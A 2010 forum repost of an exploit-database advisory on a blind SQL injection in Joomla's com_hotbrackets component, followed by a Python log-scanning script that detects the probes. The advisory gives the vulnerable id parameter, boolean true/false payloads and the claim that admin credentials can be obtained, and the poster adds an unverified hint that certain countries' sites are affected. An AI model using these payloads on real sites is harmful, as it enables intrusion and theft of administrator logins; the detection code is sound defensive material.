hozarares
Posted January 5, 2010

# Title: Joomla Component com_hotbrackets Blind SQL Injection Vulnerability
# EDB-ID: 10953
# CVE-ID: ()
# OSVDB-ID: ()
# Author: FL0RiX
# Published: 2010-01-03

<------------------- header data start ------------------- >
#############################################################
# Joomla Component com_hotbrackets Blind SQL injection Vulnerability
#############################################################
# author : Fl0riX
# Name : com_hotbrackets
# Bug Type : Blind SQL Injection
# Infection : Admin login credentials can be obtained.
# Demo Vuln. : TRUE(+) » server and 1=1 FALSE(-) » server and 1=0
# Bug Fix Advice : Harmful characters should be filtered.
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
path/index.php?option=com_hotbrackets&id=[blind]
< -- bug code end of -- >
##########################################################

This vulnerability has not been verified, but I think it works only on Turkish, Arab, Iranian and a few Italian sites......
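A defender-side check for the request pattern in the advisory above, as an added example that is not part of the original post or advisory: it scans web access-log lines for com_hotbrackets requests whose id is not a plain integer and flags clients that sent both a true and a false condition. The log lines are constructed, and the function names and the assumption that legitimate id values are non-negative integers are this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; client addresses are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [05/Jan/2010:10:00:01 +0000] "GET /index.php?option=com_hotbrackets&id=3 HTTP/1.1" 200 5120
203.0.113.9 - - [05/Jan/2010:10:00:05 +0000] "GET /index.php?option=com_hotbrackets&id=3%20and%201=1 HTTP/1.1" 200 5120
203.0.113.9 - - [05/Jan/2010:10:00:06 +0000] "GET /index.php?option=com_hotbrackets&id=3+AND+1=0 HTTP/1.1" 200 2048
198.51.100.7 - - [05/Jan/2010:10:00:09 +0000] "GET /index.php?option=com_content&id=12 HTTP/1.1" 200 4096
192.0.2.44 - - [05/Jan/2010:10:00:12 +0000] "GET /index.php?id=7abc&option=com_hotbrackets HTTP/1.1" 200 2048
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Boolean condition "and <n>=<m>", the shape of the advisory's TRUE/FALSE demo.
BOOL_TEST = re.compile(r"\band\s+(\d+)\s*=\s*(\d+)", re.IGNORECASE)


def suspicious_requests(log_text):
    """Map client -> [(decoded id, verdict)] for com_hotbrackets hits with a non-integer id."""
    findings = {}
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qs URL-decodes values, so %20 and + both become spaces.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "com_hotbrackets" not in params.get("option", []):
            continue
        for value in params.get("id", []):
            if re.fullmatch(r"[0-9]+", value):
                continue  # assumption: legitimate ids are non-negative integers
            cond = BOOL_TEST.search(value)
            if cond is None:
                verdict = "non-integer"
            else:
                verdict = "true-probe" if cond.group(1) == cond.group(2) else "false-probe"
            findings.setdefault(client, []).append((value, verdict))
    return findings


def boolean_pair_clients(findings):
    """Clients that sent both a true and a false condition (blind-injection testing)."""
    wanted = {"true-probe", "false-probe"}
    return sorted(c for c, hits in findings.items() if wanted <= {v for _, v in hits})
```

Differing response sizes for the two conditions from the same client (5120 and 2048 bytes in the constructed lines) are what a blind test relies on, so a flagged pair is worth correlating with the logged response length.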